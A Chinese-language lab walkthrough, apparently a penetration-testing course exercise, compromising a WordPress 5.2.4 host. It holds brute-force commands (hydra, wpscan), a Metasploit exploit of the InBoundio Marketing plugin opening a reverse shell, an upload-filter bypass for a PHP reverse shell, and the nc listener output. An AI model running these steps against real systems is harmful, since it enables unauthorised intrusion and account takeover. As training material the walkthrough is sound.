Worspress 入侵
套路1
┌──(root㉿kali)-[~/PT_day2]
└─# nmap 172.16.20.3 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-26 03:09 EST
Nmap scan report for 172.16.20.3
Host is up (0.044s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 27.03 seconds
套路2
┌──(root㉿kali)-[~/PT_day2]
└─# nmap 172.16.20.3 -p80 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-26 03:10 EST
Nmap scan report for 172.16.20.3
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.2.4
|_http-title: My Blogs – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.0 (94%), Linux 4.4 (94%), Linux 3.10 - 3.12 (93%), Linux 3.10 - 3.16 (92%), Linux 3.10 (91%), Linux 4.9 (91%), Linux 2.6.18 (90%), Linux 3.10 - 4.11 (89%), Linux 3.11 - 4.1 (89%), Linux 3.2 - 4.9 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 66.02 ms 192.168.200.1
2 14.94 ms 172.16.20.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds
發現只有一個80 port,探測目錄:
┌──(root㉿kali)-[~/PT_day2]
└─# nikto -host http://172.16.20.3
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.20.3
+ Target Hostname: 172.16.20.3
+ Target Port: 80
+ Start Time: 2023-02-26 03:15:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://172.16.20.3/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7925 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2023-02-26 03:18:07 (GMT-5) (179 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n
到其中一個目錄看一下:
連上網頁看一下:
接下來想用hydra來爆破密碼。打開burp suite,設定proxy。隨便輸入錯誤的:
接下來看看burp:
底下的request內容如下,可以知道第一篇提到的綠框、橘框該填什麼:
POST /wp-login.php HTTP/1.1
Host: 172.16.20.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.20.3/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://172.16.20.3
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
log=john&pwd=aaa&wp-submit=Log+In&redirect_to=http%3A%2F%2F172.16.20.3%2Fwp-admin%2F&testcookie=1
觀察一下:
hydra http post form example
How to Brute Force Websites & Online Forms Using Hydra | Infinite Logins
aaa接下來看看藍圈要填什麼:
要注意錯誤訊息複製沒有html標籤的就好。
hydra -l john -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt 172.16.20.3 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F172.16.20.3%2Fwp-admin%2F&testcookie=1:The password you entered for the username"
如果像上面這樣下指令,會找出四個ok的密碼,其實是有問題,代表指令打錯。
解決方法1: 後面加參數-t 4
,但沒用。
解決方法2: 錯誤訊息不要用The password you entered for the username
,但也沒用。
只好換另一個針對wordpress的工具--wpscan。
┌──(root㉿kali)-[~/PT_day2]
└─# wpscan --url http://172.16.20.3 -U "john" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://172.16.20.3/ [172.16.20.3]
[+] Started: Sun Feb 26 06:28:41 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://172.16.20.3/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.16.20.3/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://172.16.20.3/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.16.20.3/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.4 identified (Insecure, released on 2019-10-14).
| Found By: Rss Generator (Passive Detection)
| - http://172.16.20.3/index.php/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
| - http://172.16.20.3/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://172.16.20.3/wp-content/themes/twentynineteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://172.16.20.3/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://172.16.20.3/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.16.20.3/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] inboundio-marketing
| Location: http://172.16.20.3/wp-content/plugins/inboundio-marketing/
| Latest Version: 2.0.1 (up to date)
| Last Updated: 2015-07-23T07:01:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 2.0.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.16.20.3/wp-content/plugins/inboundio-marketing/README.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://172.16.20.3/wp-content/plugins/inboundio-marketing/README.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - john / iloveyou
Trying john / robert Time: 00:00:01 < > (55 / 1000055) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: john, Password: iloveyou
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Feb 26 06:28:50 2023
[+] Requests Done: 246
[+] Cached Requests: 5
[+] Data Sent: 74.246 KB
[+] Data Received: 20.031 MB
[+] Memory used: 267.863 MB
[+] Elapsed time: 00:00:09
得知密碼iloveyou。枚舉使用者帳號:
┌──(root㉿kali)-[~/PT_day2]
└─# wpscan --url http://172.16.20.3 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://172.16.20.3/ [172.16.20.3]
[+] Started: Sun Feb 26 06:34:31 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://172.16.20.3/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://172.16.20.3/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://172.16.20.3/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://172.16.20.3/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.4 identified (Insecure, released on 2019-10-14).
| Found By: Rss Generator (Passive Detection)
| - http://172.16.20.3/index.php/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
| - http://172.16.20.3/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.4</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://172.16.20.3/wp-content/themes/twentynineteen/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://172.16.20.3/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://172.16.20.3/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://172.16.20.3/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] jason
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://172.16.20.3/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] alvin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] john
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] james
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Feb 26 06:34:34 2023
[+] Requests Done: 31
[+] Cached Requests: 36
[+] Data Sent: 8.299 KB
[+] Data Received: 86.785 KB
[+] Memory used: 174.059 MB
[+] Elapsed time: 00:00:03
第一小題解決。
第二小題,先利用第一小題得到的密碼登入:
檢查外掛有沒有poc可用:
┌──(kali㉿kali)-[~]
└─$ msfconsole
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: You can upgrade a shell to a Meterpreter
session on many platforms using sessions -u
<session_id>
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search inboundio
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_inboundio_marketing_file_upload 2015-03-24 excellent Yes Wordpress InBoundio Marketing PHP Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_inboundio_marketing_file_upload
看來第二個外掛是有:
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > show options
Module options (exploit/unix/webapp/wp_inboundio_marketing_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:por
t[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.
metasploit.com/docs/using-metasploit/
basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connec
tions
TARGETURI / yes The base path to the wordpress applic
ation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.18.192 yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 InBoundio Marketing 2.0
View the full module info with the info, or info -d command.
進行攻擊設定:
msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > set rhosts 172.16.20.3
rhosts => 172.16.20.3
msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > set lhost 192.168.200.3
lhost => 192.168.200.3
msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > set lport 16203
lport => 16203
msf6 exploit(unix/webapp/wp_inboundio_marketing_file_upload) > run
[*] Started reverse TCP handler on 192.168.200.3:16203
[+] Our payload is at: vbkTtLKBbXER.php.
[*] Calling payload...
[*] Sending stage (39927 bytes) to 172.16.20.3
[+] Deleted vbkTtLKBbXER.php
[*] Meterpreter session 1 opened (192.168.200.3:16203 -> 172.16.20.3:37394) at 2023-02-26 06:52:38 -0500
meterpreter > shell
Process 8386 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
會改lport只是因為剛剛前一題用過了,而現在成功入侵,但shell很難用,所以穩定shell:
python -c 'import pty;pty.spawn("/bin/bash")'
<s/inboundio-marketing/admin/partials/uploaded_csv$ cd /
cd /
www-data@localhost:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
www-data@localhost:/$ find / -type f -name sevret.txt -print 2>dev/null
find / -type f -name sevret.txt -print 2>dev/null
www-data@localhost:/$ find / -type f -name secret.txt -print 2>dev/null
find / -type f -name secret.txt -print 2>dev/null
/home/jason/Desktop/secret.txt
www-data@localhost:/$ cat /home/jason/Desktop/secret.txt
cat /home/jason/Desktop/secret.txt
$ECur!ty
後面的-print 2>dev/null
是為了避免出現一堆permission denied,意思是把錯誤資訊丟給dev的null。
如果不用metaspolit,還有另一個方式,就是上傳reverse shell:
kali的reverse shell放在上圖路徑,現在把它複製到別的地方:
編輯這個php:
┌──(root㉿kali)-[~]
└─# cd /home/kali/Downloads
┌──(root㉿kali)-[/home/kali/Downloads]
└─# vim php-reverse-shell.php
改紅底線處,改成攻擊機的IP跟port:
把它改個附檔名,希望它不會被wordpress擋下來。
┌──(root㉿kali)-[/home/kali/Downloads]
└─# mv php-reverse-shell.php abbot.php
┌──(root㉿kali)-[/home/kali/Downloads]
└─# mv abbot.php abbot.php.jpg
到上傳介面:
這時開啟burp跟攔截,因為到時候會需要查看是否會被wordpress檔下,並找上傳後檔案的網址。
上傳:
因為開啟了intercept,所以上傳後會卡在100%,不會done
查看目前intecept內的內容:
把.jpg
給刪掉,一直按左上的Forward直到沒東西,代表真的把這php上傳完畢,這時再切換到HTTP history。
可以發現edited有打勾的:
6號跟8號之間的7號是wordpress檢查上傳檔案的網頁。
可以發現php已成功上傳,連結如上圖紅底,所以先在攻擊機監聽:
┌──(root㉿kali)-[~/PT_day2]
└─# nc -lvnp 8081
listening on [any] 8081 ...
注意proxy的設定要復原。
點選abbot.php,會發現攻擊機變成以下畫面,代表控制成功:
┌──(root㉿kali)-[~/PT_day2]
└─# nc -lvnp 8081
listening on [any] 8081 ...
connect to [192.168.200.3] from (UNKNOWN) [172.16.20.3] 58836
Linux localhost.localdomain 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2 (2019-08-28) x86_64 GNU/Linux
12:07:17 up 1 day, 3:24, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jason :1 :1 14Mar22 ?xdm? 1:38 0.01s /usr/lib/gdm3/gdm-x-session --run-script /usr/bin/gnome-session
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
也可以不用點網頁上的php,直接用wget下載剛剛的url也可以造成觸發。